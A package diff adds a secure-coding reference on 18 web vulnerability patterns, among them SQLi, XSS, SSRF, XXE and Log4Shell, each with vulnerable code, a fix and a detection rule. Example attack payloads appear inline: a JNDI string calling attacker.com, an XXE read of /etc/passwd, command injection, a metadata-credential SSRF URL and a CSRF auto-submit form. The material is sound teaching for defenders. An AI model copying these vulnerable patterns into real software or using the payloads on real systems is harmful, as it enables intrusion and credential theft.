@wazir-dev/cli 1.0.0

package/expertise/antipatterns/security/vulnerability-patterns.md

@@ -0,0 +1,801 @@
+# Vulnerability Patterns
+
+> **Domain:** Security
+> **Severity:** Critical -- web application vulnerabilities account for 26% of all breaches (Verizon DBIR 2024).
+> **Last updated:** 2026-03-08
+> **Applies to:** All web applications, APIs, backend services, and cloud-native workloads.
+
+---
+
+## Why This Matters
+
+The same vulnerability patterns keep recurring in production. The Equifax breach (CVE-2017-5638)
+exposed 147 million records through an unpatched Struts flaw. Log4Shell (CVE-2021-44228)
+gave attackers RCE on 93% of cloud enterprise environments. Capital One lost 106 million
+customer records to a single SSRF. These are not exotic zero-days -- they are well-documented
+patterns developers introduce through string concatenation, trusting user input, skipping
+authorization checks, and deserializing untrusted data.
+
+---
+
+## VP-01: SQL Injection (Classic / Blind / Second-Order)
+
+**Also known as:** SQLi, CWE-89, OWASP A03:2021. CVEs: CVE-2019-9193, CVE-2024-27198 (TeamCity).
+
+| Frequency | Severity | Detection difficulty |
+|---|---|---|
+| Very High | Critical | Low (classic), Medium (blind), High (second-order) |
+
+**What it looks like:**
+```python
+query = f"SELECT * FROM users WHERE username = '{username}' AND password = '{password}'"
+cursor.execute(query)
+# Second-order: user registers as "admin'--"; stored payload triggers in a later admin query
+```
+
+**Why developers do it:** String interpolation is the most natural way to build dynamic
+queries. ORMs feel heavyweight for simple lookups.
+
+**What goes wrong:** Heartland Payment Systems (2008) lost 130 million credit cards via SQLi.
+CVE-2024-27198 in JetBrains TeamCity allowed unauthenticated SQLi leading to full server
+compromise, actively exploited in the wild.
+
+**The fix:**
+```python
+cursor.execute("SELECT * FROM users WHERE username = %s AND password = %s", (username, hashed))
+```
+
+**Detection rule:** Flag string concatenation or f-strings containing SQL keywords with
+variable interpolation. Semgrep: `pattern: f"...SELECT...{$VAR}..."`.
+
+---
+
+## VP-02: Cross-Site Scripting -- Stored (Persistent XSS)
+
+**Also known as:** XSS Type II, CWE-79, OWASP A03:2021. CVEs: CVE-2023-29489 (cPanel),
+CVE-2024-21726 (Joomla).
+
+| Frequency | Severity | Detection difficulty |
+|---|---|---|
+| Very High | High | Medium |
+
+**What it looks like:**
+```javascript
+app.post('/comment', (req, res) => {
+  db.comments.insert({ body: req.body.comment }); // no sanitization
+});
+app.get('/post/:id', (req, res) => {
+  const comments = db.comments.find({ postId: req.params.id });
+  res.send(`<div>${comments.map(c => c.body).join('')}</div>`); // raw HTML output
+});
+```
+
+**Why developers do it:** Rendering user content feels straightforward. Auto-escaping gets
+bypassed via `| safe` or `dangerouslySetInnerHTML`.
+
+**What goes wrong:** The 2018 British Airways breach used stored XSS in a compromised
+third-party script to skim 380,000 payment cards (ICO fined BA 20M GBP). The Samy worm
+(2005) infected 1 million MySpace profiles in 20 hours via stored XSS.
+
+**The fix:**
+```javascript
+import DOMPurify from 'dompurify';
+const safe = comments.map(c => DOMPurify.sanitize(c.body)).join('');
+// Also set: Content-Security-Policy: script-src 'self'
+```
+
+**Detection rule:** Grep for `innerHTML`, `dangerouslySetInnerHTML`, `| safe`, `{!! !!}`,
+`<%- %>` (EJS unescaped) outputting user-controlled data.
+
+---
+
+## VP-03: Cross-Site Scripting -- Reflected and DOM-Based
+
+**Also known as:** XSS Type I / Type 0, CWE-79. CVEs: CVE-2021-41184 (jQuery UI),
+CVE-2023-46747 (F5 BIG-IP, CVSS 9.8).
+
+| Frequency | Severity | Detection difficulty |
+|---|---|---|
+| Very High | Medium-High | Low (reflected), Medium (DOM) |
+
+**What it looks like:**
+```javascript
+// Reflected: server echoes input
+app.get('/search', (req, res) => { res.send(`<h1>Results for: ${req.query.q}</h1>`); });
+
+// DOM-based: client reads from location
+document.getElementById('output').innerHTML = new URLSearchParams(location.search).get('q');
+```
+
+**Why developers do it:** Echoing search terms seems harmless. `innerHTML` is faster than
+creating DOM nodes programmatically.
+
+**What goes wrong:** CVE-2023-46747 in F5 BIG-IP allowed unauthenticated RCE via a reflected
+XSS chain that bypassed authentication entirely.
+
+**The fix:**
+```javascript
+// Reflected: use auto-escaping template engine
+res.render('search', { query: req.query.q });
+// DOM: use textContent instead of innerHTML
+document.getElementById('output').textContent = query;
+```
+
+**Detection rule:** Grep for `innerHTML`, `outerHTML`, `document.write`, `eval(` combined
+with URL/location sources. Semgrep: `pattern: document.$EL.innerHTML = $SOURCE`.
+
+---
+
+## VP-04: Cross-Site Request Forgery (CSRF)
+
+**Also known as:** XSRF, Session Riding, CWE-352, OWASP A01:2021. CVEs: CVE-2024-4439
+(WordPress), CVE-2023-28370 (Tornado).
+
+| Frequency | Severity | Detection difficulty |
+|---|---|---|
+| High | High | Low |
+
+**What it looks like:**
+```html
+<form action="https://bank.com/transfer" method="POST" id="csrf">
+  <input type="hidden" name="to" value="attacker" />
+  <input type="hidden" name="amount" value="10000" />
+</form>
+<script>document.getElementById('csrf').submit();</script>
+```
+
+**Why developers do it:** Session cookies are sent automatically; developers assume
+authenticated requests are intentional.
+
+**What goes wrong:** In 2006, Netflix was vulnerable to CSRF allowing attackers to change
+shipping addresses and login credentials. In 2008, ING Direct had CSRF allowing attackers
+to open accounts and transfer funds from authenticated users, even over SSL.
+
+**The fix:**
+```python
+from flask_wtf.csrf import CSRFProtect
+csrf = CSRFProtect(app)
+# For APIs: SameSite=Strict cookies + custom header validation
+response.set_cookie('session', value=token, samesite='Strict', httponly=True)
+```
+
+**Detection rule:** Flag state-changing endpoints (POST/PUT/DELETE) without CSRF token
+validation. Check for `SameSite=None` on session cookies.
+
+---
+
+## VP-05: Server-Side Request Forgery (SSRF)
+
+**Also known as:** CWE-918, OWASP A10:2021. CVEs: CVE-2021-26855 (Exchange ProxyLogon),
+CVE-2024-21893 (Ivanti).
+
+| Frequency | Severity | Detection difficulty |
+|---|---|---|
+| High | Critical | Medium |
+
+**What it looks like:**
+```python
+@app.route('/fetch')
+def fetch_url():
+    url = request.args.get('url')
+    return requests.get(url).text  # no validation
+# Attacker: /fetch?url=http://169.254.169.254/latest/meta-data/iam/security-credentials/
+```
+
+**Why developers do it:** Webhooks, URL previews, and PDF generators require server-side
+fetches. Developers validate the scheme but forget internal IP ranges and metadata endpoints.
+
+**What goes wrong:** The **Capital One breach (2019)** is the canonical SSRF case. An attacker
+exploited a misconfigured WAF on EC2 to SSRF the AWS metadata service (169.254.169.254),
+retrieving IAM credentials for `ISRM-WAF-Role` which granted S3 access to 106 million
+customer records. AWS subsequently released IMDSv2 requiring session tokens. CVE-2021-26855
+(ProxyLogon) in Exchange used SSRF to bypass auth, exploited by Hafnium APT.
+
+**The fix:**
+```python
+import ipaddress
+from urllib.parse import urlparse
+
+BLOCKED = [ipaddress.ip_network(n) for n in
+    ['169.254.0.0/16','10.0.0.0/8','172.16.0.0/12','192.168.0.0/16','127.0.0.0/8']]
+
+def is_safe_url(url):
+    parsed = urlparse(url)
+    if parsed.scheme not in ('http','https'): return False
+    ip = ipaddress.ip_address(parsed.hostname)
+    return not any(ip in net for net in BLOCKED)
+```
+
+**Detection rule:** Flag `requests.get()`, `urllib.urlopen()`, `fetch()`, `HttpClient`
+where URL originates from user input without allowlist validation.
+
+---
+
+## VP-06: Insecure Deserialization
+
+**Also known as:** CWE-502, OWASP A08:2021. CVEs: CVE-2015-4852 (WebLogic), CVE-2017-5638
+(Struts), CVE-2017-9805 (Struts XStream).
+
+| Frequency | Severity | Detection difficulty |
+|---|---|---|
+| Medium | Critical | High |
+
+**What it looks like:**
+```python
+data = base64.b64decode(request.cookies.get('session'))
+return pickle.loads(data)  # arbitrary code execution
+```
+```java
+ObjectInputStream ois = new ObjectInputStream(request.getInputStream());
+Object obj = ois.readObject(); // gadget chain -> RCE
+```
+
+**Why developers do it:** Language-native serialization (pickle, Java ObjectInputStream, PHP
+unserialize) is convenient. Developers assume cookies and internal APIs carry trusted data.
+
+**What goes wrong:** CVE-2015-4852 in WebLogic used Java deserialization via T3 for
+unauthenticated RCE, widely exploited for ransomware. CVE-2017-5638 (Struts/OGNL injection)
+enabled the **Equifax breach (2017)**: attackers exploited it for 78 days, stealing SSNs and
+addresses of 147 million Americans. A patch had been available for two months. Settlement
+cost: $1.38 billion.
+
+**The fix:**
+```python
+return json.loads(data)  # no code execution possible
+# Java: use JEP 290 deserialization filters with allowlists
+```
+
+**Detection rule:** Flag `pickle.loads`, `yaml.load` (no SafeLoader), `unserialize()`,
+`readObject()`, `Marshal.load` on user-controlled data.
+
+---
+
+## VP-07: Path Traversal
+
+**Also known as:** Directory Traversal, CWE-22, OWASP A01:2021. CVEs: CVE-2021-41773
+(Apache httpd), CVE-2023-34362 (MOVEit).
+
+| Frequency | Severity | Detection difficulty |
+|---|---|---|
+| High | High | Low |
+
+**What it looks like:**
+```python
+@app.route('/download')
+def download():
+    return send_file(f'/var/www/uploads/{request.args.get("file")}')
+# Attacker: /download?file=../../../etc/passwd
+```
+
+**Why developers do it:** Serving files by name is intuitive. Developers trust the base path
+prefix without realizing `../` and URL-encoded variants (`%2e%2e%2f`) escape it.
+
+**What goes wrong:** CVE-2021-41773 in Apache 2.4.49 allowed path traversal via URL-encoded
+dots leading to file disclosure and RCE -- mass exploitation within hours. CVE-2023-34362 in
+MOVEit Transfer combined path traversal with SQLi; Cl0p ransomware gang exploited it at scale.
+
+**The fix:**
+```python
+filepath = os.path.realpath(os.path.join(base, filename))
+if not filepath.startswith(base): abort(403)
+return send_file(filepath)
+```
+
+**Detection rule:** Flag file operations (`open`, `send_file`, `readFile`, `include`) where
+path includes user input without `realpath()` canonicalization and prefix validation.
+
+---
+
+## VP-08: Command Injection
+
+**Also known as:** OS Command Injection, CWE-78, OWASP A03:2021. CVEs: CVE-2024-3400
+(PAN-OS, CVSS 10.0), CVE-2021-22205 (GitLab).
+
+| Frequency | Severity | Detection difficulty |
+|---|---|---|
+| Medium | Critical | Medium |
+
+**What it looks like:**
+```python
+result = os.popen(f'ping -c 4 {request.args.get("host")}').read()
+# Attacker: /ping?host=8.8.8.8;cat /etc/passwd
+```
+
+**Why developers do it:** Shell commands are powerful one-liners. Developers reach for
+`os.system()` when no library equivalent is obvious.
+
+**What goes wrong:** CVE-2024-3400 in Palo Alto PAN-OS (CVSS 10.0) allowed unauthenticated
+command injection via GlobalProtect, exploited as a zero-day to deploy backdoors.
+CVE-2021-22205 in GitLab allowed RCE via ExifTool command injection in image uploads.
+
+**The fix:**
+```python
+result = subprocess.run(['ping', '-c', '4', host], capture_output=True, text=True, shell=False)
+```
+
+**Detection rule:** Flag `os.system()`, `os.popen()`, `shell=True`, `exec()`, backticks,
+`child_process.exec()` where arguments include user input.
+
+---
+
+## VP-09: XML External Entity (XXE) Injection
+
+**Also known as:** CWE-611, OWASP A05:2021. CVEs: CVE-2014-3529 (Apache POI),
+CVE-2014-3574 (Billion Laughs), CVE-2021-29441 (Nacos).
+
+| Frequency | Severity | Detection difficulty |
+|---|---|---|
+| Medium | High | Medium |
+
+**What it looks like:**
+```xml
+<!DOCTYPE foo [ <!ENTITY xxe SYSTEM "file:///etc/passwd"> ]>
+<user><name>&xxe;</name></user>
+```
+
+**Why developers do it:** XML parsers enable external entities by default in many languages.
+DOCX, SVG, and SAML responses are all XML documents that get parsed without secure
+configuration.
+
+**What goes wrong:** CVE-2014-3529 in Apache POI allowed XXE via crafted Office files,
+enabling arbitrary file reads on any server processing uploads. Facebook's bug bounty paid
+out for XXE in their careers portal that read internal server files. SAML-based SSO is a
+frequent target because SAML responses are XML parsed by service providers.
+
+**The fix:**
+```python
+parser = etree.XMLParser(resolve_entities=False, no_network=True, dtd_validation=False, load_dtd=False)
+tree = etree.parse(request.stream, parser)
+```
+
+**Detection rule:** Flag XML parser instantiation without entity/DTD disabling. Grep for
+`etree.parse`, `DocumentBuilderFactory`, `SAXParser` without `disallow-doctype-decl`.
+
+---
+
+## VP-10: Prototype Pollution
+
+**Also known as:** CWE-1321, OWASP A08:2021. CVEs: CVE-2023-36665 (protobuf.js),
+CVE-2024-21529 (dset), CVE-2024-21505 (web3-utils).
+
+| Frequency | Severity | Detection difficulty |
+|---|---|---|
+| Medium-High | High | High |
+
+**What it looks like:**
+```javascript
+function merge(target, source) {
+  for (const key in source) {
+    if (typeof source[key] === 'object') target[key] = merge(target[key] || {}, source[key]);
+    else target[key] = source[key];
+  }
+  return target;
+}
+// Attacker sends: {"__proto__": {"isAdmin": true}}
+merge({}, JSON.parse(userInput));
+// Now ({}).isAdmin === true for every object
+```
+
+**Why developers do it:** Deep merge is fundamental to config handling. Lodash `_.merge`,
+jQuery `$.extend`, and custom merges do not filter `__proto__` by default.
+
+**What goes wrong:** CVE-2023-36665 in protobuf.js enabled RCE/DoS via prototype pollution.
+CVE-2024-21505 affected blockchain apps via `mergeDeep`. In 2023, researchers demonstrated
+full RCE chains via prototype pollution in Express/EJS applications by polluting `child_process`
+properties.
+
+**The fix:**
+```javascript
+function safeMerge(target, source) {
+  for (const key of Object.keys(source)) {
+    if (key === '__proto__' || key === 'constructor' || key === 'prototype') continue;
+    if (typeof source[key] === 'object' && source[key] !== null && !Array.isArray(source[key]))
+      target[key] = safeMerge(target[key] || {}, source[key]);
+    else target[key] = source[key];
+  }
+  return target;
+}
+// Or: use Object.create(null) or Map for dynamic keys
+```
+
+**Detection rule:** Flag `for...in` on user objects without `hasOwnProperty`. Flag recursive
+merge functions missing `__proto__`/`constructor` filtering.
+
+---
+
+## VP-11: Mass Assignment
+
+**Also known as:** Auto-binding, CWE-915, OWASP A08:2021.
+
+| Frequency | Severity | Detection difficulty |
+|---|---|---|
+| High | High | Medium |
+
+**What it looks like:**
+```python
+for key, value in request.data.items():
+    setattr(user, key, value)  # attacker sends {"is_staff": true}
+user.save()
+```
+
+**Why developers do it:** One-line model updates from form data. Developers assume the
+frontend only sends expected fields.
+
+**What goes wrong:** In 2012, Egor Homakov exploited mass assignment in **GitHub itself**. By
+submitting a crafted public_key attribute pointing to a Rails core member's account, he gained
+commit access to the Ruby on Rails repository. This incident led directly to Rails adding
+strong parameters in Rails 4.
+
+**The fix:**
+```python
+ALLOWED = {'display_name', 'email', 'bio'}
+for key, value in request.data.items():
+    if key in ALLOWED: setattr(user, key, value)
+```
+
+**Detection rule:** Flag iteration over request data setting model attributes without an
+explicit allowlist. Grep for `setattr(model, key, ...)`, `Object.assign(model, req.body)`.
+
+---
+
+## VP-12: Open Redirects
+
+**Also known as:** CWE-601, OWASP A01:2021. CVEs: CVE-2024-29041 (Express.js),
+CVE-2024-5492 (NetScaler).
+
+| Frequency | Severity | Detection difficulty |
+|---|---|---|
+| High | Medium | Low |
+
+**What it looks like:**
+```python
+@app.route('/login')
+def login():
+    return redirect(request.args.get('next'))  # no validation
+# Attacker: /login?next=https://evil.com/phishing
+```
+
+**Why developers do it:** Post-login redirects are legitimate UX. URL tricks
+(`//evil.com`, `https://evil.com%40legit.com`) bypass naive checks.
+
+**What goes wrong:** CVE-2024-29041 in Express.js allowed URL encoding to bypass allowlists.
+Open redirects are critical in OAuth phishing chains: attackers steal authorization codes by
+redirecting callbacks through a legitimate-looking domain.
+
+**The fix:**
+```python
+parsed = urlparse(next_url)
+if parsed.netloc and parsed.netloc not in ALLOWED_HOSTS: next_url = '/'
+return redirect(next_url)
+```
+
+**Detection rule:** Flag `redirect()`, `res.redirect()`, `Location:` header where target
+includes user input without domain allowlist.
+
+---
+
+## VP-13: Insecure Direct Object Reference (IDOR)
+
+**Also known as:** BOLA, CWE-639, OWASP A01:2021 / API #1.
+
+| Frequency | Severity | Detection difficulty |
+|---|---|---|
+| Very High | High | Medium |
+
+**What it looks like:**
+```python
+@app.route('/api/invoices/<int:invoice_id>')
+def get_invoice(invoice_id):
+    return jsonify(db.invoices.find_one({'id': invoice_id}))  # no ownership check
+```
+
+**Why developers do it:** Database PKs as API identifiers is simplest. Developers confuse
+authentication (who you are) with authorization (what you can access).
+
+**What goes wrong:** In 2021, Parler's sequential post IDs without authorization enabled
+scraping of terabytes of data including GPS metadata and deleted posts. In 2020, IDOR was
+found in a U.S. Department of Defense website, reported via their Vulnerability Disclosure
+Program. IDOR is rated #1 API security risk by OWASP API Top 10.
+
+**The fix:**
+```python
+invoice = db.invoices.find_one({'id': invoice_id, 'owner_id': current_user.id})
+if not invoice: abort(404)  # 404, not 403 -- don't reveal existence
+```
+
+**Detection rule:** Flag data queries using user-supplied IDs without ownership/role
+filtering. Check for sequential integer IDs in API routes.
+
+---
+
+## VP-14: Server-Side Template Injection (SSTI)
+
+**Also known as:** CWE-1336, OWASP A03:2021. CVEs: CVE-2022-22954 (VMware),
+CVE-2023-46604 (ActiveMQ, CVSS 10.0).
+
+| Frequency | Severity | Detection difficulty |
+|---|---|---|
+| Medium | Critical | Medium |
+
+**What it looks like:**
+```python
+template = f"<h1>Hello {request.args.get('name')}!</h1>"
+return render_template_string(template)
+# Attacker: /greet?name={{config.items()}}  ->  escalates to RCE via __subclasses__
+```
+
+**Why developers do it:** Dynamic template generation seems flexible. Developers confuse
+template rendering (safe, with context variables) with template compilation (unsafe, with
+user-controlled strings).
+
+**What goes wrong:** In 2016, researchers Orange Tsai and James Kettle found SSTI in **Uber**:
+injecting `{{7*7}}` into profile fields produced `49` in emails, proving template execution.
+CVE-2022-22954 in VMware Workspace ONE allowed SSTI-to-RCE, exploited by APT groups.
+
+**The fix:**
+```python
+return render_template_string("<h1>Hello {{ name }}!</h1>", name=name)
+# Never pass user input as template source. Use logic-less engines (Mustache) for user templates.
+```
+
+**Detection rule:** Flag `render_template_string()`, `Template()`, `new Function()` where
+the template string includes user input.
+
+---
+
+## VP-15: Race Conditions in Security Checks
+
+**Also known as:** TOCTOU, CWE-367/CWE-362. CVEs: CVE-2024-30088 (Windows Kernel),
+CVE-2024-50379 (Tomcat), CVE-2024-23651 (Docker BuildKit).
+
+| Frequency | Severity | Detection difficulty |
+|---|---|---|
+| Medium | High | Very High |
+
+**What it looks like:**
+```python
+coupon = db.coupons.find_one({'code': code})
+if coupon and coupon['remaining'] > 0:      # CHECK
+    apply_discount(current_user, coupon)
+    coupon['remaining'] -= 1                 # USE -- race window between check and use
+    db.coupons.save(coupon)
+```
+
+**Why developers do it:** Sequential check-then-act is natural. Developers test with single
+requests and never observe concurrent behavior.
+
+**What goes wrong:** CVE-2024-30088 in Windows Kernel: TOCTOU exploited by APT34 for
+privilege escalation in government attacks. CVE-2024-50379 in Apache Tomcat: race in JSP
+compilation led to RCE (50+ public PoCs). CVE-2024-23651 in Docker BuildKit: mount cache
+race enabled container breakout.
+
+**The fix:**
+```python
+result = db.coupons.update_one(
+    {'code': code, 'remaining': {'$gt': 0}},  # atomic check+use
+    {'$inc': {'remaining': -1}}
+)
+if result.modified_count > 0: apply_discount(current_user, code)
+```
+
+**Detection rule:** Flag check-then-act patterns where a security check (`if balance >`,
+`if os.access`) is separated from the action without a lock or atomic operation.
+
+---
+
+## VP-16: Regular Expression Denial of Service (ReDoS)
+
+**Also known as:** Catastrophic Backtracking, CWE-1333. CVEs: CVE-2024-21538 (cross-spawn),
+CVE-2022-24999 (qs).
+
+| Frequency | Severity | Detection difficulty |
+|---|---|---|
+| Medium | Medium-High | Medium |
+
+**What it looks like:**
+```javascript
+const emailRegex = /^([a-zA-Z0-9]+)*@[a-zA-Z0-9]+\.[a-zA-Z]+$/;
+emailRegex.test("aaaaaaaaaaaaaaaaaaaaaaaaaaa!"); // hangs -- 2^27 backtracking steps
+```
+
+**Why developers do it:** Developers write regexes by intuition. Nested quantifiers
+(`(a+)+`, `(.*a){n}`) look correct but create exponential backtracking on non-matching input.
+
+**What goes wrong:** On July 2, 2019, **Cloudflare** deployed a WAF regex rule with
+catastrophic backtracking. It exhausted CPU on every core handling HTTP worldwide, taking
+Cloudflare offline for 27 minutes affecting millions of sites. Cloudflare rewrote their WAF
+in Rust's non-backtracking regex engine. CVE-2024-21538 in cross-spawn (200M+ weekly
+downloads) contained ReDoS in argument parsing.
+
+**The fix:**
+```javascript
+const RE2 = require('re2'); // non-backtracking engine
+const emailRegex = new RE2('^[a-zA-Z0-9._%+-]+@[a-zA-Z0-9.-]+\\.[a-zA-Z]{2,}$');
+// Or: limit input length, use purpose-built validators (validator.isEmail)
+```
+
+**Detection rule:** Static analysis for nested quantifiers: `(.+)+`, `(.*)*`, `(a|a)*`.
+Use `safe-regex` or `vuln-regex-detector`. Set regex execution timeouts.
+
+---
+
+## VP-17: Log Injection / Log4Shell
+
+**Also known as:** CWE-117 (Log Injection), CWE-917 (JNDI). CVEs: CVE-2021-44228 (Log4Shell),
+CVE-2021-45046, CVE-2021-45105, CVE-2021-44832.
+
+| Frequency | Severity | Detection difficulty |
+|---|---|---|
+| High (log injection) / Medium (JNDI) | Critical (Log4Shell) / Medium (log injection) | Low / High |
+
+**What it looks like:**
+```java
+// Log4Shell: JNDI lookup in logged strings
+logger.info("User-Agent: " + request.getHeader("User-Agent"));
+// Attacker sends header: ${jndi:ldap://attacker.com/exploit}
+// Log4j resolves JNDI -> connects to attacker LDAP -> downloads and executes class
+```
+```python
+# Plain log injection: forging log entries
+logger.info(f"Login attempt for user: {username}")
+# Attacker sends: "admin\n2026-03-08 INFO Login successful for user: admin"
+```
+
+**Why developers do it:** Logging user input is best practice for auditing. Developers assume
+log frameworks are sinks, not execution engines. Log4j's `${...}` lookup was enabled by
+default on all messages.
+
+**What goes wrong:** **CVE-2021-44228 (Log4Shell)**, disclosed December 9, 2021, scored CVSS
+10.0. Log4j 2.0-beta9 through 2.14.1 resolved JNDI lookups in logged messages, giving
+attackers unauthenticated RCE via a single HTTP header. Wiz/EY research: 93% of cloud
+enterprise environments were vulnerable. Amazon, Google, Microsoft cloud affected. Attackers
+deployed cryptominers, ransomware, and persistent backdoors. Three follow-on CVEs:
+CVE-2021-45046 (context bypass), CVE-2021-45105 (DoS), CVE-2021-44832 (JDBC RCE).
+
+**The fix:**
+```java
+// Update Log4j to 2.17.1+. Use parameterized logging:
+logger.info("User-Agent: {}", request.getHeader("User-Agent"));
+// Pre-patch: -Dlog4j2.formatMsgNoLookups=true
+// Plain log injection: strip newlines
+String safe = username.replaceAll("[\\r\\n]", "_");
+```
+
+**Detection rule:** Scan deps for `log4j-core` < 2.17.1. Flag string concatenation in
+logger calls. Check for `${` in log output.
+
+---
+
+## VP-18: Dependency Confusion & Header Injection
+
+### VP-18a: Dependency Confusion
+
+**Also known as:** Namespace Confusion, Supply Chain Attack. CVE: CVE-2021-24105 (Azure).
+
+| Frequency | Severity | Detection difficulty |
+|---|---|---|
+| Medium | Critical | High |
+
+**What it looks like:**
+```json
+{ "dependencies": { "mycompany-auth-utils": "^1.2.0" } }
+// If not on public npm, attacker registers it -- npm prefers public over private
+// Attacker's preinstall script exfiltrates env vars
+```
+
+**Why developers do it:** Package managers resolve from public registries by default.
+Organizations use private names without registering public placeholders.
+
+**What goes wrong:** In February 2021, Alex Birsan breached 35+ companies including **Apple,
+Microsoft, PayPal, Netflix, Tesla, and Uber** by registering public packages matching private
+names. Code executed on internal build servers with zero interaction. Microsoft awarded $40K
+(their highest) and assigned CVE-2021-24105. Birsan earned $130K+ total.
+
+**The fix:**
+```
+# Use scoped packages: @mycompany/auth-utils
+# .npmrc: @mycompany:registry=https://private.registry.com/
+# Pin with hashes: mycompany-auth==1.2.0 --hash=sha256:abc123
+# Register placeholder packages on public registries
+```
+
+**Detection rule:** Audit private package names against public registries. Check for
+unscoped packages existing only on private registries.
+
+### VP-18b: Header Injection (CRLF / HTTP Response Splitting)
+
+**Also known as:** CWE-113, CWE-93. CVEs: CVE-2024-52875 (KerioControl), CVE-2024-20337
+(Cisco Secure Client).
+
+| Frequency | Severity | Detection difficulty |
+|---|---|---|
+| Medium | Medium-High | Low |
+
+**What it looks like:**
+```python
+response.headers['Location'] = request.args.get('url')
+# Attacker: ?url=http://legit.com%0d%0aSet-Cookie:%20admin=true
+```
+
+**Why developers do it:** User input in headers (Location, Content-Disposition) without
+stripping CRLF (`\r\n` / `%0d%0a`).
+
+**What goes wrong:** CVE-2024-52875 in KerioControl firewalls: CRLF led to XSS and session
+hijacking. CVE-2024-20337 in Cisco Secure Client: CRLF in SAML responses stole tokens for
+unauthorized VPN sessions.
+
+**The fix:**
+```python
+import re
+safe_value = re.sub(r'[\r\n]', '', user_input)
+# Best: use framework redirect functions that sanitize automatically
+```
+
+**Detection rule:** Flag header assignments using user-supplied values without CRLF stripping.
+
+---
+
+## Root Cause Analysis
+
+| Root Cause | Patterns Affected | Principle Violated |
+|---|---|---|
+| **Trusting user input** | SQLi, XSS, CMDi, SSTI, Path Traversal, Header/Log Injection, XXE | Never trust, always validate |
+| **Missing authorization** | IDOR, Mass Assignment, CSRF | Verify permissions on every request |
+| **Unsafe defaults** | XXE (entities on), Log4j (lookups on), Deserialization (all classes) | Secure by default |
+| **String concat for structured data** | SQLi, XSS, CMDi, SSTI, Log/Header Injection | Use parameterized APIs |
+| **Insufficient boundary enforcement** | SSRF, Path Traversal, Open Redirects, ReDoS | Validate structure, not just presence |
+| **Implicit internal trust** | SSRF, Dependency Confusion | Zero-trust at every boundary |
+| **Non-atomic security checks** | Race conditions (TOCTOU) | Make check-and-act indivisible |
+| **Over-permissive data binding** | Mass Assignment, Prototype Pollution | Allowlist fields, reject unknowns |
+| **Uncontrolled deserialization** | Insecure Deser., XXE, Prototype Pollution | Never deserialize into executable constructs |
+| **Supply chain trust** | Dependency Confusion, Log4Shell (transitive) | Verify provenance, pin versions |
+
+---
+
+## Self-Check Questions
+
+1. **Does any query use string concatenation with user input?** -> SQLi (VP-01)
+2. **Is user content rendered without escaping?** -> XSS (VP-02/03)
+3. **Do state-changing endpoints validate CSRF tokens?** -> CSRF (VP-04)
+4. **Can users control URLs the server fetches?** -> SSRF (VP-05)
+5. **Is user data deserialized via pickle/Java/PHP native formats?** -> Deser. (VP-06)
+6. **Are file paths built from user input without canonicalization?** -> Path Traversal (VP-07)
+7. **Are shell commands built with user input or shell=True?** -> CMDi (VP-08)
+8. **Does XML parsing disable external entities and DTDs?** -> XXE (VP-09)
+9. **Are objects merged with user data without __proto__ filtering?** -> Prototype Pollution (VP-10)
+10. **Can API consumers set arbitrary model fields?** -> Mass Assignment (VP-11)
+11. **Do redirects use user URLs without domain allowlists?** -> Open Redirect (VP-12)
+12. **Are data lookups keyed by user IDs without ownership checks?** -> IDOR (VP-13)
+13. **Is user input placed inside compiled template strings?** -> SSTI (VP-14)
+14. **Are security check-then-act sequences non-atomic?** -> Race Conditions (VP-15)
+
+---
+
+## Code Smell Quick Reference
+
+| Code Smell | Vulnerability | Confidence |
+|---|---|---|
+| `f"SELECT ... {var}"` | SQL Injection (VP-01) | High |
+| `innerHTML = userInput` | XSS (VP-02/03) | High |
+| `dangerouslySetInnerHTML={{__html: var}}` | XSS (VP-02/03) | High |
+| `render_template_string(user_input)` | SSTI (VP-14) | High |
+| `pickle.loads(untrusted)` | Deserialization (VP-06) | High |
+| `yaml.load(data)` (no SafeLoader) | Deserialization (VP-06) | High |
+| `os.system(f"... {var}")` | Command Injection (VP-08) | High |
+| `subprocess.run(..., shell=True)` | Command Injection (VP-08) | Medium |
+| `requests.get(user_url)` | SSRF (VP-05) | Medium |
+| `redirect(request.params['url'])` | Open Redirect (VP-12) | Medium |
+| `send_file(base + user_filename)` | Path Traversal (VP-07) | High |
+| `etree.parse(stream)` (no config) | XXE (VP-09) | Medium |
+| `for (key in obj) target[key] = obj[key]` | Prototype Pollution (VP-10) | Medium |
+| `setattr(model, key, val)` in loop | Mass Assignment (VP-11) | High |
+| `response.headers['X'] = user_input` | Header Injection (VP-18b) | Medium |
+| `logger.info("msg: " + user_input)` | Log Injection (VP-17) | Medium |
+| `/^(a+)+$/` or `/(.*a){5}/` | ReDoS (VP-16) | High |
+| `db.find({id: req.params.id})` (no owner) | IDOR (VP-13) | Medium |
+| POST endpoint without CSRF token | CSRF (VP-04) | Medium |
+| Private pkg name without scope prefix | Dependency Confusion (VP-18a) | Medium |
+
+---
+
+*Researched: 2026-03-08 | Sources: OWASP Top 10 (2021), NVD (nvd.nist.gov), CVE-2017-5638 (Equifax/Apache Struts), CVE-2021-44228 (Log4Shell/CISA), Capital One SSRF breach (2019/Krebs on Security), CVE-2015-4852 (WebLogic), CVE-2024-30088 (Windows Kernel TOCTOU), CVE-2024-50379 (Apache Tomcat), CVE-2023-36665 (protobuf.js), CVE-2024-21529 (dset), CVE-2021-24105 (Azure Artifacts/Alex Birsan), Cloudflare 2019 ReDoS outage, CVE-2024-3400 (PAN-OS), CVE-2021-41773 (Apache httpd), CVE-2024-52875 (KerioControl), CVE-2024-29041 (Express.js), GitHub mass assignment (2012/Homakov), Netflix CSRF (2006), ING Direct CSRF (2008), Uber SSTI (2016/Orange Tsai/James Kettle), Parler IDOR (2021), PortSwigger Web Security Academy, Wiz/EY Log4Shell research, Snyk vulnerability database*